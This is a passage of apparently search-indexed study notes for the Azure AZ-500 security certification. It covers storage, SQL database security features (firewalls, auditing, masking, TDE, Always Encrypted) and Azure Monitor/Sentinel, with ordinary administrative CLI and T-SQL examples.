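                              --account-name demostorageacct

                            # Rotate (regenerate) key1 while clients temporarily use key2.
                            az storage account keys renew \
                              --resource-group demo-rg \
                              --account-name demostorageacct \
                              --key key1
                            ```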

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#38-configure-azure-files-authentication","title":"3.8. Configure Azure files authentication","text":"

                            Azure Files supports identity-based authentication over Server Message Block (SMB) through on-premises Active Directory Domain Services (AD DS) and Microsoft Entra Domain Services. With RBAC, the credentials you use for file access should be available or synced to Microsoft Entra ID.

                            Azure Files enforces authorization on user access to both the share and the directory/file levels.

                            At the directory/file level, Azure Files supports preserving, inheriting, and enforcing Windows DACLs just like any Windows file servers. You can choose to keep Windows DACLs when copying data over SMB between your existing file share and your Azure file shares. Whether you plan to enforce authorization or not, you can use Azure file shares to back up ACLs along with your data.

                            Benefits of Identity-based authentication over using Shared Key authentication:

                            • Extend the traditional identity-based file share access experience to the cloud with on-premises AD DS and Microsoft Entra Domain Services.
                            • Enforce granular access control on Azure file shares.
                            • Back up Windows ACLs (also known as NTFS permissions) along with your data. You can copy ACLs on a directory or file to Azure file shares using either Azure File Sync or common file movement toolsets. For example, you can use robocopy with the /copy:s flag to copy data as well as ACLs to an Azure file share. ACLs are preserved by default; you are not required to enable identity-based authentication on your storage account to preserve ACLs.

                            How it works:

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#39-enable-the-secure-transfer-required-property","title":"3.9. Enable the secure transfer required property","text":"

                            You can configure your storage account to accept requests from secure connections only by setting the Secure transfer required property for the storage account. When you require secure transfer, any requests originating from an insecure connection are rejected. Microsoft recommends that you always require secure transfer for all of your storage accounts.

                            Connecting to an Azure file share over SMB without encryption fails when secure transfer is required for the storage account. Examples of insecure connections include those made over SMB 2.1, SMB 3.0 without encryption, or some versions of the Linux SMB client; when secure transfer is required, Azure Files accepts only encrypted SMB connections.

                            By default, the Secure transfer required property is enabled when you create a storage account. Because Azure Storage doesn't support HTTPS for custom domain names, this option is not applied when you're using a custom domain name.
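
                            A sketch of enforcing the property on an existing account; the names are placeholders:

                            ```bash
                            # Reject any request that arrives over an insecure connection.
                            az storage account update \
                              --resource-group demo-rg \
                              --name demostorageacct \
                              --https-only true
                            ```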

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#4-sql-database-security","title":"4. SQL database security","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#41-sql-database-authentication","title":"4.1. SQL database authentication","text":"

                            A user is authenticated using one of the following two authentication methods:

                            • SQL authentication\u00a0- With this authentication method, the user submits a user account name and associated password to establish a connection. This password is stored in the master database for user accounts linked to a login or stored in the database containing the user accounts not linked to a login.
                            • Microsoft Entra authentication\u00a0- With this authentication method, the user submits a user account name and requests that the service use the credential information stored in Microsoft Entra ID.

                            You can create user accounts in the master database and grant permissions in all databases on the server, or you can create them in the database itself (called contained database users). By using contained databases, you obtain enhanced portability and scalability.

                            Logins and users: In Azure SQL, a user account in a database can be associated with a login that is stored in the master database or can be a user name that is stored in an individual database.

                            • A login is an individual account in the master database, to which a user account in one or more databases can be linked. With a login, the credential information for the user account is stored with the login.
                            • A user account is an individual account in any database that may be, but does not have to be, linked to a login. With a user account that is not linked to a login, the credential information is stored with the user account.

                            Authorization to access data and perform various actions is managed using database roles and explicit permissions. Authorization is controlled by your user account's database role memberships and object-level permissions.

                            Best practices:

                            • Grant users the least privileges necessary.
                            • Your application should use a dedicated account to authenticate.
                            • Recommended: create a contained database user, which allows your app to authenticate directly to the database.

                            Use Microsoft Entra authentication to centrally manage identities of database users and as an alternative to SQL Server authentication.
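
                            A sketch of setting a Microsoft Entra administrator on a logical SQL server; names and the object ID are placeholders, and parameter spellings can vary slightly between CLI versions:

                            ```bash
                            # Make an Entra user or group the administrator of the logical SQL server.
                            az sql server ad-admin create \
                              --resource-group demo-rg \
                              --server-name demo-sql-server \
                              --display-name "DBA Group" \
                              --object-id <entra-object-id>

                            # Inside a database, a contained Entra user can then be created with T-SQL:
                            #   CREATE USER [user@contoso.com] FROM EXTERNAL PROVIDER;
                            ```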

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#42-configure-sql-database-firewalls","title":"4.2. Configure SQL database firewalls","text":"

                            Azure SQL Database and Azure Synapse Analytics, previously SQL Data Warehouse, (both referred to as SQL Database in this lesson) provide a relational database service for Azure and other internet-based applications.

                            Initially, all access to your Azure SQL Database is blocked by the SQL Database firewall.

The firewall grants access to databases based on:
• the originating IP address of each request.
• virtual network rules based on virtual network service endpoints. Virtual network rules might be preferable to IP rules in some cases.

Azure SQL Firewall IP rules:
• Server-level IP firewall rules allow clients to access the entire Azure SQL server, which includes all databases hosted in it. The master database holds these rules, and you can configure a maximum of 128 server-level IP firewall rules for an Azure SQL server, using the Azure portal, PowerShell, or Transact-SQL statements. To create server-level IP firewall rules using the Azure portal or PowerShell, you must be the subscription owner or a subscription contributor. To create a server-level IP firewall rule using Transact-SQL, you must connect to the SQL Database instance as the server-level principal login or the Microsoft Entra administrator (which means that a server-level IP firewall rule must first have been created by a user with Azure-level permissions).
• Database-level IP firewall rules allow access to specific databases on a SQL Database server. You can create them for each database, including the master database, with a maximum of 128 rules per database. You can only create and manage database-level IP firewall rules for the master database and user databases by using Transact-SQL statements, and only after you have configured the first server-level firewall rule.

                            Azure Synapse Analytics only supports server-level IP firewall rules, and not database-level IP firewall rules.

Database-level firewall rules are evaluated first.

                            To allow applications from Azure to connect to your Azure SQL Database, Azure connections must be enabled. When an application from Azure attempts to connect to your database server, the firewall verifies that Azure connections are allowed. A firewall setting with starting and ending addresses equal to 0.0.0.0 indicates Azure connections are allowed. This option configures the firewall to allow all connections from Azure including connections from the subscriptions of other customers. When selecting this option, make sure your sign-in and user permissions limit access to authorized users only.

                            Whenever possible, as a best practice, use database-level IP firewall rules to enhance security and to make your database more portable. Use server-level IP firewall rules for administrators and when you have several databases with the same access requirements, and you don't want to spend time configuring each database individually.
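A sketch of creating both rule types, with placeholder names throughout: the server-level rule via the Azure CLI, the database-level rule via the sp_set_database_firewall_rule procedure in T-SQL:

```
# Server-level IP rule (stored in master; needs subscription owner/contributor).
az sql server firewall-rule create \
  --resource-group myrg --server myserver \
  --name AllowOfficeIP \
  --start-ip-address 203.0.113.10 --end-ip-address 203.0.113.10

# Database-level IP rule (Transact-SQL only; run inside the target database).
sqlcmd -S myserver.database.windows.net -d mydb -U dbadmin -P '<password>' \
  -Q "EXECUTE sp_set_database_firewall_rule N'AllowOfficeIP', '203.0.113.10', '203.0.113.10';"
```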

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#43-enable-and-monitor-database-auditing","title":"4.3. Enable and monitor database auditing","text":"

                            Auditing for Azure SQL Database and Azure Synapse Analytics tracks database events and writes them to an audit log in your Azure storage account, Log Analytics workspace or Event Hubs.

                            Auditing also:

                            • Helps you maintain regulatory compliance, understand database activity, and gain insight into discrepancies and anomalies that could indicate business concerns or suspected security violations.
• Enables and facilitates adherence to compliance standards, although it doesn't guarantee compliance.

                            You can use SQL database auditing to:

• Retain an audit trail of selected events. You can define categories of database actions to be audited.
• Report on database activity. You can use pre-configured reports and a dashboard to get started quickly with activity and event reporting.
• Analyze reports. You can find suspicious events, unusual activity, and trends.

In auditing, server-level auditing policies take precedence over database-level auditing policies. This means that:

                            • A server policy applies to all existing and newly created databases on the server.
                            • If server auditing is enabled, it always applies to the database. The database will be audited, regardless of the database auditing settings.
                            • Enabling auditing on the database or data warehouse, in addition to enabling it on the server, does not override or change any of the settings of the server auditing. Both audits will exist side by side. In other words, the database is audited twice in parallel; once by the server policy and once by the database policy.
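For example, server-level auditing to a storage account can be enabled from the Azure CLI; a sketch with placeholder names (exact flag spellings may differ between CLI versions):

```
# Enable server-level auditing; the policy then applies to every existing
# and newly created database on the server.
az sql server audit-policy update \
  --resource-group myrg --name myserver \
  --state Enabled \
  --blob-storage-target-state Enabled \
  --storage-account mystorageacct
```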
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#44-implement-data-discovery-and-classification","title":"4.4. Implement data discovery and classification","text":"

Data discovery and classification provides advanced capabilities built into Azure SQL Database for discovering, classifying, labeling, and protecting sensitive data (such as business, personal, and financial information) in your databases. Discovering and classifying this data can play a pivotal role in your organization's information protection posture. It can serve as infrastructure for:

                            • Helping meet data privacy standards and regulatory compliance requirements.
                            • Addressing various security scenarios such as monitoring, auditing, and alerting on anomalous access to sensitive data.
                            • Controlling access to and hardening the security of databases containing highly sensitive data.

Data exists in one of three basic states: at rest, in process, and in transit. All three states require unique technical solutions for data classification, but the applied principles of data classification should be the same for each. Data that is classified as confidential needs to stay confidential when at rest, in process, or in transit.

Data can also be either structured or unstructured. Typical classification processes for structured data found in databases and spreadsheets are less complex and time-consuming to manage than those for unstructured data such as documents, source code, and email. Generally, organizations will have more unstructured data than structured data.

                            Protect data at rest

• Best practice: Apply disk encryption to help safeguard your data. Solution: Use Microsoft Azure Disk Encryption, which enables IT administrators to encrypt both Windows infrastructure as a service (IaaS) and Linux IaaS virtual machine (VM) disks. Disk encryption combines the industry-standard BitLocker feature and the Linux DM-Crypt feature to provide volume encryption for the operating system (OS) and the data disks. Azure Storage and Azure SQL Database encrypt data at rest by default, and many services offer encryption as an option. You can use Azure Key Vault to maintain control of keys that access and encrypt your data.
• Best practice: Use encryption to help mitigate risks related to unauthorized data access. Solution: Encrypt your drives before you write sensitive data to them.

                            Protect data in transit

We generally recommend that you always use SSL/TLS protocols to exchange data across different locations. In some circumstances, you might want to isolate the entire communication channel between your on-premises and cloud infrastructures by using a VPN. For data moving between your on-premises infrastructure and Azure, consider appropriate safeguards such as HTTPS or VPN. When sending encrypted traffic between an Azure virtual network and an on-premises location over the public internet, use Azure VPN Gateway.

• Best practice: Secure access from multiple workstations located on-premises to an Azure virtual network. Solution: Use site-to-site VPN.
• Best practice: Secure access from an individual workstation located on-premises to an Azure virtual network. Solution: Use point-to-site VPN.
• Best practice: Move larger data sets over a dedicated high-speed wide area network (WAN) link. Solution: Use Azure ExpressRoute. If you choose to use ExpressRoute, you can also encrypt the data at the application level by using SSL/TLS or other protocols for added protection.
• Best practice: Interact with Azure Storage through the Azure portal. Solution: All transactions occur via HTTPS. You can also use the Storage REST API over HTTPS to interact with Azure Storage and Azure SQL Database.

                            Data discovery and classification is part of the Advanced Data Security offering, which is a unified package for advanced Microsoft SQL Server security capabilities. You access and manage data discovery and classification via the central SQL Advanced Data Security portal.

• Discovery and recommendations - The classification engine scans your database and identifies columns containing potentially sensitive data. It then provides you with an easier way to review and apply the appropriate classification recommendations via the Azure portal.
• Labeling - Sensitivity classification labels can be persistently tagged on columns using new classification metadata attributes introduced into the SQL Server Engine. This metadata can then be utilized for advanced sensitivity-based auditing and protection scenarios.
• Information Types - These provide additional granularity into the type of data stored in the column.
• Query result set sensitivity - The sensitivity of the query result set is calculated in real time for auditing purposes.
• Visibility - You can view the database classification state in a detailed dashboard in the Azure portal. Additionally, you can download a report (in Microsoft Excel format) that you can use for compliance and auditing purposes, in addition to other needs.

                            SQL data discovery and classification comes with a built-in set of sensitivity labels and information types, and discovery logic. You can now customize this taxonomy and define a set and ranking of classification constructs specifically for your environment. Definition and customization of your classification taxonomy takes place in one central location for your entire Azure Tenant. That location is in Microsoft Defender for Cloud, as part of your Security Policy. Only a user with administrative rights on the Tenant root management group can perform this task.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#45-microsoft-defender-for-sql","title":"4.5. Microsoft Defender for SQL","text":"

Applies to: Azure SQL Database | Azure SQL Managed Instance | Azure Synapse Analytics

                            Microsoft Defender for SQL includes functionality for surfacing and mitigating potential database vulnerabilities and detecting anomalous activities that could indicate a threat to your database. It provides a single go-to location for enabling and managing these capabilities.

                            Microsoft Defender for SQL provides:

                            • Vulnerability Assessment is an easy-to-configure service that can discover, track, and help you remediate potential database vulnerabilities. It provides visibility into your security state, and it includes actionable steps to resolve security issues and enhance your database fortifications.
• Advanced Threat Protection detects anomalous activities indicating unusual and potentially harmful attempts to access or exploit your database. It continuously monitors your database for suspicious activities, and it provides immediate security alerts on potential vulnerabilities, SQL injection attacks, and anomalous database access patterns. Advanced Threat Protection alerts provide details of suspicious activity and recommend action on how to investigate and mitigate the threat.

                            Enabling or managing Microsoft Defender for SQL settings requires belonging to the SQL security manager role or one of the database or server admin roles.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#vulnerability-assessment-for-sql-server","title":"Vulnerability assessment for SQL Server","text":"

Applies to: Azure SQL Database | Azure SQL Managed Instance | Azure Synapse Analytics

                            • Vulnerability assessment is a scanning service built into Azure SQL Database.
                            • The service employs a knowledge base of rules that flag security vulnerabilities.
• These rules cover database-level issues and server-level security issues, like server firewall settings and server-level permissions: permission configurations, feature configurations, and database settings.
                            • The results of the scan include actionable steps to resolve each issue and provide customized remediation scripts where applicable.
                            • Vulnerability assessment is part of Microsoft Defender for Azure SQL, which is a unified package for advanced SQL security capabilities. Vulnerability assessment can be accessed and managed from each SQL database resource in the Azure portal.

SQL vulnerability assessment express and classic configurations. You can configure vulnerability assessment for your SQL databases with either:

• Express configuration (preview) - The default procedure that lets you configure vulnerability assessment without dependency on external storage to store baseline and scan result data.
• Classic configuration - The legacy procedure that requires you to manage an Azure storage account to store baseline and scan result data.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#46-sql-advanced-threat-protection","title":"4.6. SQL Advanced Threat Protection","text":"

                            Applies to: Azure SQL Database | Azure SQL Managed Instance | Azure Synapse Analytics | SQL Server on Azure Virtual Machines | Azure Arc-enabled SQL Server

                            • SQL Advanced Threat Protection detects anomalous activities indicating unusual and potentially harmful attempts to access or exploit databases.
• Users receive an alert upon suspicious database activities, potential vulnerabilities, and SQL injection attacks, as well as anomalous database access and query patterns.
                            • Advanced Threat Protection integrates alerts with Microsoft Defender for Cloud.
                            • For a full investigation experience, it is recommended to enable auditing, which writes database events to an audit log in your Azure storage account.
• Click the Advanced Threat Protection alert to launch the Microsoft Defender for Cloud alerts page and get an overview of active SQL threats detected on the database.
                            • Advanced Threat Protection is part of the Microsoft Defender for SQL offering, which is a unified package for advanced SQL security capabilities. Advanced Threat Protection can be accessed and managed via the central Microsoft Defender for SQL portal.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#47-sql-database-dynamic-data-masking-ddm","title":"4.7. SQL Database Dynamic Data Masking (DDM)","text":"

Dynamic data masking helps prevent unauthorized access to sensitive data by enabling customers to designate how much of the sensitive data to reveal, with minimal impact on the application layer. You set up a dynamic data masking policy in the Azure portal by selecting the dynamic data masking operation in your SQL Database configuration blade or settings blade. This feature cannot be set by using the portal for Azure Synapse.

Configuring a DDM policy:

• SQL users excluded from masking - A set of SQL users or Microsoft Entra identities that get unmasked data in the SQL query results. Users with administrator privileges are always excluded from masking, and view the original data without any mask.
• Masking rules - A set of rules that define the designated fields to be masked and the masking function that is used. The designated fields can be defined using a database schema name, table name, and column name.
• Masking functions - A set of methods that control the exposure of data for different scenarios.

The DDM recommendations engine flags certain fields from your database as potentially sensitive fields, which may be good candidates for masking. In the Dynamic Data Masking blade in the portal, you can review the recommended columns for your database. All you need to do is click Add Mask for one or more columns and then Save to apply a mask for these fields.
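Masking rules can also be defined directly in T-SQL; a minimal sketch against a hypothetical table and user:

```
# Mask an email column for non-privileged users and exempt one analyst account.
sqlcmd -S myserver.database.windows.net -d mydb -U dbadmin -P '<password>' -Q "
ALTER TABLE dbo.Customers
  ALTER COLUMN Email ADD MASKED WITH (FUNCTION = 'email()');
GRANT UNMASK TO [analyst];  -- exclude this user from masking
"
```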

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#48-implement-transparent-data-encryption-tde","title":"4.8. Implement Transparent Data Encryption (TDE)","text":"
                            • Applies to Azure SQL Database | Azure SQL Managed Instance | Synapse SQL in Azure Synapse Analytics.
                            • To configure TDE through the Azure portal, you must be connected as the Azure Owner, Contributor, or SQL Security Manager.
                            • Encrypts data at rest.
                            • It performs real-time encryption and decryption of the database, associated backups, and transaction log files at rest without requiring changes to the application.
• By default, TDE is enabled for all newly deployed Azure SQL databases and needs to be manually enabled for older databases of Azure SQL Database, Azure SQL Managed Instance, or Azure Synapse.
• It cannot be used to encrypt the logical master database, because that database contains objects that TDE needs to perform the encrypt/decrypt operations.
                            • TDE encrypts the storage of an entire database by using a symmetric key called the Database Encryption Key (DEK).
• DEK is protected by the TDE protector. Where is this TDE protector set?
                              • At the logical SQL server level: For Azure SQL Database and Azure Synapse, the TDE protector is set at the logical SQL server level and is inherited by all databases associated with that server.
                              • At the instance level: For Azure SQL Managed Instance (BYOK feature in preview), the TDE protector is set at the instance level and it is inherited by all encrypted databases on that instance.

The TDE protector is either a service-managed certificate (service-managed transparent data encryption) or an asymmetric key stored in Azure Key Vault (customer-managed transparent data encryption).

                            • The default setting for TDE is that the DEK is protected by a built-in server certificate.
                              • If two databases are connected to the same server, they also share the same built-in certificate.
                              • The built-in server certificate is unique for each server and the encryption algorithm used is AES 256.
                              • Microsoft automatically rotates these certificates. Additionally, Microsoft seamlessly moves and manages the keys as needed for geo-replication and restores.
• The root key is protected by a Microsoft internal secret store.
• With customer-managed TDE, or Bring Your Own Key (BYOK), the TDE protector that encrypts the DEK is a customer-managed asymmetric key, which is stored in a customer-owned and managed Azure Key Vault (Azure's cloud-based external key management system) and never leaves the key vault.
                              • The TDE Protector can be generated by the key vault or transferred to the key vault from an on premises hardware security module (HSM) device.
                              • SQL Database needs to be granted permissions to the customer-owned key vault to decrypt and encrypt the DEK.
                              • With TDE with Azure Key Vault integration, users can control key management tasks including key rotations, key vault permissions, key backups, and enable auditing/reporting on all TDE protectors using Azure Key Vault functionality.

You can turn TDE on and off from the Azure portal, except for Azure SQL Managed Instance, where you need to use T-SQL to turn TDE on and off on a database.
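A sketch of both paths, assuming placeholder names:

```
# Azure SQL Database: toggle TDE from the CLI.
az sql db tde set \
  --resource-group myrg --server myserver --database mydb \
  --status Enabled

# Azure SQL Managed Instance: T-SQL is required instead.
sqlcmd -S myinstance.<dns-zone>.database.windows.net -d master -U admin -P '<password>' \
  -Q "ALTER DATABASE [mydb] SET ENCRYPTION ON;"
```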

Transact-SQL (T-SQL) is an extension of the standard SQL (Structured Query Language) used for querying and managing relational databases, particularly in the context of Microsoft SQL Server and Azure SQL Database. It is needed and used for the following reasons:
1. Procedural capabilities: T-SQL includes procedural programming constructs such as variables, loops, and conditional statements, which are not part of standard SQL.
2. SQL Server-specific functions: T-SQL includes functions and features that are specific to SQL Server and may not be supported by other database management systems.
3. System management: T-SQL provides commands and procedures for managing SQL Server instances, databases, and security, which are not part of the standard SQL language.
4. Error handling: T-SQL has error handling mechanisms like TRY...CATCH blocks, which are not part of the standard SQL syntax.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#49-azure-sql-always-encrypted","title":"4.9. Azure SQL Always Encrypted","text":"

                            Always Encrypted helps protect sensitive data at rest on the server, during movement between client and server, and while the data is in use. Always Encrypted ensures that sensitive data never appears as plaintext inside the database system. After you configure data encryption, only client applications or app servers that have access to the keys can access plaintext data. Always Encrypted uses the AEAD_AES_256_CBC_HMAC_SHA_256 algorithm to encrypt data in the database.

                            Always Encrypted allows clients to encrypt sensitive data inside client applications and never reveal the encryption keys to the Database Engine (SQL Database or SQL Server).

Two examples:
• Client on-premises with data in Azure: A customer has an on-premises client application at their business location. The application operates on sensitive data stored in a database hosted in Azure (SQL Database or SQL Server running in a virtual machine on Microsoft Azure). The customer uses Always Encrypted and stores Always Encrypted keys in a trusted key store hosted on-premises, to ensure Microsoft cloud administrators have no access to sensitive data.
• Client and data in Azure: A customer has a client application, hosted in Microsoft Azure (for example, in a worker role or a web role), which operates on sensitive data stored in a database hosted in Azure (SQL Database or SQL Server running in a virtual machine on Microsoft Azure). Although Always Encrypted does not provide complete isolation of data from cloud administrators, as both the data and keys are exposed to cloud administrators of the platform hosting the client tier, the customer still benefits from reducing the security attack surface area (the data is always encrypted in the database).

                            The Always Encrypted-enabled driver automatically encrypts and decrypts sensitive data in the client application before sending the data off to the SQL server. Always Encrypted supports two types of encryption: randomized encryption and deterministic encryption.

• Deterministic encryption always generates the same encrypted value for any given plain text value. Using deterministic encryption allows point lookups, equality joins, grouping, and indexing on encrypted columns. However, it may also allow unauthorized users to guess information about encrypted values by examining patterns in the encrypted column, especially if there is a small set of possible encrypted values, such as True/False or North/South/East/West region. Deterministic encryption must use a column collation with a binary2 sort order for character columns.
• Randomized encryption uses a method that encrypts data in a less predictable manner. Randomized encryption is more secure, but prevents searching, grouping, indexing, and joining on encrypted columns.
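To illustrate the two types, a hypothetical table definition; the column encryption key CEK1 is an assumption and must already have been provisioned (for example, with SSMS or PowerShell):

```
sqlcmd -S myserver.database.windows.net -d mydb -U dbadmin -P '<password>' -Q "
CREATE TABLE dbo.Patients (
    PatientId INT IDENTITY PRIMARY KEY,
    -- Deterministic: allows equality lookups; needs a BIN2 collation.
    SSN CHAR(11) COLLATE Latin1_General_BIN2
        ENCRYPTED WITH (COLUMN_ENCRYPTION_KEY = CEK1,
                        ENCRYPTION_TYPE = DETERMINISTIC,
                        ALGORITHM = 'AEAD_AES_256_CBC_HMAC_SHA_256'),
    -- Randomized: more secure; no searching, grouping, or joining on it.
    Diagnosis NVARCHAR(200)
        ENCRYPTED WITH (COLUMN_ENCRYPTION_KEY = CEK1,
                        ENCRYPTION_TYPE = RANDOMIZED,
                        ALGORITHM = 'AEAD_AES_256_CBC_HMAC_SHA_256')
);
"
```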

Available in all editions of Azure SQL Database, and in SQL Server starting with SQL Server 2016.

Deploying an Always Encrypted implementation:

                            The initial setup of Always Encrypted in a database involves generating Always Encrypted keys, creating key metadata, configuring encryption properties of selected database columns, and/or encrypting data that may already exist in columns that need to be encrypted.

                            Some of these tasks aren't supported in Transact-SQL. You can use SQL Server Management Studio (SSMS) or PowerShell to accomplish such tasks.

• Provisioning column master keys, column encryption keys, and encrypted column encryption keys with their corresponding column master keys: SSMS Yes, PowerShell Yes, SQL No.
• Creating key metadata in the database: SSMS Yes, PowerShell Yes, SQL Yes.
• Creating new tables with encrypted columns: SSMS Yes, PowerShell Yes, SQL Yes.
• Encrypting existing data in selected database columns: SSMS Yes, PowerShell Yes, SQL No.

                            When setting up encryption for a column, you specify the information about the encryption algorithm and cryptographic keys used to protect the data in the column. Always Encrypted uses two types of keys: column encryption keys and column master keys. A column encryption key is used to encrypt data in an encrypted column. A column master key is a key-protecting key that encrypts one or more column encryption keys.

                            The Database Engine stores encryption configuration for each column in database metadata. Note, however, the Database Engine never stores or uses the keys of either type in plaintext. It only stores encrypted values of column encryption keys and the information about the location of column master keys, which are stored in external trusted key stores, such as Azure Key Vault, Windows Certificate Store on a client machine, or a hardware security module.

To access data stored in an encrypted column in plaintext, an application must use an Always Encrypted enabled client driver. When an application issues a parameterized query, the driver transparently collaborates with the Database Engine to determine which parameters target encrypted columns and, thus, should be encrypted. For each parameter that needs to be encrypted, the driver obtains the information about the encryption algorithm and the encrypted value of the column encryption key for the column the parameter targets, as well as the location of its corresponding column master key.

Next, the driver contacts the key store containing the column master key in order to decrypt the encrypted column encryption key value, and then it uses the plaintext column encryption key to encrypt the parameter. The resulting plaintext column encryption key is cached to reduce the number of round trips to the key store on subsequent uses of the same column encryption key. The driver substitutes the plaintext values of the parameters targeting encrypted columns with their encrypted values, and it sends the query to the server for processing.

                            The server computes the result set, and for any encrypted columns included in the result set, the driver attaches the encryption metadata for the column, including the information about the encryption algorithm and the corresponding keys. The driver first tries to find the plaintext column encryption key in the local cache, and only makes a round to the column master key if it can't find the key in the cache. Next, the driver decrypts the results and returns plaintext values to the application.

                            A client driver interacts with a key store, containing a column master key, using a column master key store provider, which is a client-side software component that encapsulates a key store containing the column master key. Providers for common types of key stores are available in client-side driver libraries from Microsoft or as standalone downloads. You can also implement your own provider. Always Encrypted capabilities, including built-in column master key store providers vary by a driver library and its version.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/","title":"IV. Security operation","text":"Sources of this notes
                            • The Microsoft e-learn platform.
                            • Book: \"Microsoft Certified - MCA Microsoft Certified Associate Azure Security Engineer Study Guide: Exam AZ-500.
                            • Udemy course: AZ-500 Microsoft Azure Security Technologies Exam Prep.
                            • Udemy course: Azure Security: AZ-500 (updated July 2023)
                            Summary: AZ-500 Microsoft Azure Security Engineer Certification
                            • About the certificate
                            • I. Manage Identity and Access
                            • II. Platform protection
                            • III. Data and applications
                            • IV. Security operations
                            • AZ-500 and more: keep learning

                            Cheatsheets: Azure-CLI | Azure PowerShell

                            100 questions you should pass for the AZ-500 certificate

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#1-configure-and-manage-azure-monitor","title":"1. Configure and manage Azure Monitor","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#11-exploring-azure-monitor","title":"1.1. Exploring Azure Monitor","text":"

                            Exporting data to a SIEM

Azure Monitor offers a consolidated pipeline for routing any of your monitoring data into a SIEM tool. This is done by streaming that data to an event hub, where it can then be pulled into a partner tool. This pipeline uses the Azure Monitor single pipeline for getting access to the monitoring data from your Azure environment. Currently, the exposed security data from Microsoft Defender for Cloud to a SIEM consists of security alerts.
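A sketch of that pipeline: a diagnostic setting routing a resource's logs (here a hypothetical key vault) to an event hub that a SIEM can pull from. All names and IDs are placeholders, and the available log categories depend on the resource type:

```
az monitor diagnostic-settings create \
  --name to-siem \
  --resource "/subscriptions/<sub-id>/resourceGroups/myrg/providers/Microsoft.KeyVault/vaults/mykv" \
  --event-hub myhub \
  --event-hub-rule "/subscriptions/<sub-id>/resourceGroups/myrg/providers/Microsoft.EventHub/namespaces/myns/authorizationRules/RootManageSharedAccessKey" \
  --logs '[{"category":"AuditEvent","enabled":true}]'
```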

Microsoft Defender for Cloud security alerts: Microsoft Defender for Cloud automatically collects, analyzes, and integrates log data from your Azure resources, the network, and connected partner solutions.

Azure Event Hubs: Azure Event Hubs is a streaming platform and event ingestion service that can transform and store data by using any real-time analytics provider or batching/storage adapters. Use Event Hubs to stream log data from Azure Monitor to Microsoft Sentinel or a partner SIEM and monitoring tools. What data can be sent into an event hub? Within your Azure environment, there are several 'tiers' of monitoring data, and the method of accessing data from each tier varies slightly.

• Application monitoring data - Data about the performance and functionality of the code you have written and are running on Azure. Examples of application monitoring data include performance traces, application logs, and user telemetry. Application monitoring data is usually collected in one of the following ways:
  • By instrumenting your code with an SDK such as the Application Insights SDK.
  • By running a monitoring agent that listens for new application logs on the machine running your application, such as the Windows Azure Diagnostic Agent or Linux Azure Diagnostic Agent.
• Guest OS monitoring data - Data about the operating system on which your application is running. Examples of guest OS monitoring data would be Linux syslog or Windows system events. To collect this type of data, you need to install an agent such as the Windows Azure Diagnostic Agent or Linux Azure Diagnostic Agent.
• Azure resource monitoring data - Data about the operation of an Azure resource. For some Azure resource types, such as virtual machines, there is a guest OS and application(s) to monitor inside of that Azure service. For other Azure resources, such as Network Security Groups, the resource monitoring data is the highest tier of data available (since there is no guest OS or application running in those resources). This data can be collected using resource diagnostic settings.
• Azure subscription monitoring data - Data about the operation and management of an Azure subscription, as well as data about the health and operation of Azure itself. The activity log contains most subscription monitoring data, such as service health incidents and Azure Resource Manager audits. You can collect this data using a Log Profile.
• Azure tenant monitoring data - Data about the operation of tenant-level Azure services, such as Microsoft Entra ID. The Microsoft Entra audits and sign-ins are examples of tenant monitoring data. This data can be collected using a tenant diagnostic setting.

                            Some of the features of Microsoft Sentinel are:

                            • More than 100 built-in alert rules
                              • Sentinel's alert rule wizard to create your own.
                              • Alerts can be triggered by a single event or based on a threshold, or by correlating different datasets or by using built-in machine learning algorithms.
• Jupyter Notebooks that use a growing collection of hunting queries, exploratory queries, and Python libraries.
• Investigation graph for visualizing and traversing the connections between entities like users, assets, applications, or URLs and related activities like logins, data transfers, or application usage, to rapidly understand the scope and impact of an incident.

To onboard Microsoft Sentinel:
• Enable it.
• Connect your data sources with connectors that include Microsoft Threat Protection solutions, Microsoft 365 sources, Microsoft Entra ID, Azure ATP, and Microsoft Cloud App Security. In addition, there are built-in connectors to the broader security ecosystem for non-Microsoft solutions. You can also use Common Event Format, Syslog, or the REST API to connect your data sources with Microsoft Sentinel.
• After you connect your data sources, choose from a gallery of expertly created dashboards that surface insights based on your data.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#12-configure-and-monitor-metrics-and-logs","title":"1.2. Configure and monitor metrics and logs","text":"

All data that Azure Monitor collects fits into one of two fundamental types: metrics or logs.

Azure Monitor Metrics. Metrics are numerical values that are collected at regular intervals and describe some aspect of a system at a particular time. There are multiple types of metrics supported by Azure Monitor Metrics:

• Native metrics use tools in Azure Monitor for analysis and alerting.
  • Platform metrics are collected from Azure resources. They require no configuration and have no cost.
  • Custom metrics are collected from different sources that you configure, including applications and agents running on virtual machines.
• Prometheus metrics (preview) are collected from Kubernetes clusters, including Azure Kubernetes Service (AKS), and use industry-standard tools for analyzing and alerting, such as PromQL and Grafana.

What is Prometheus? Prometheus is an open-source toolkit that collects data for monitoring and alerting.

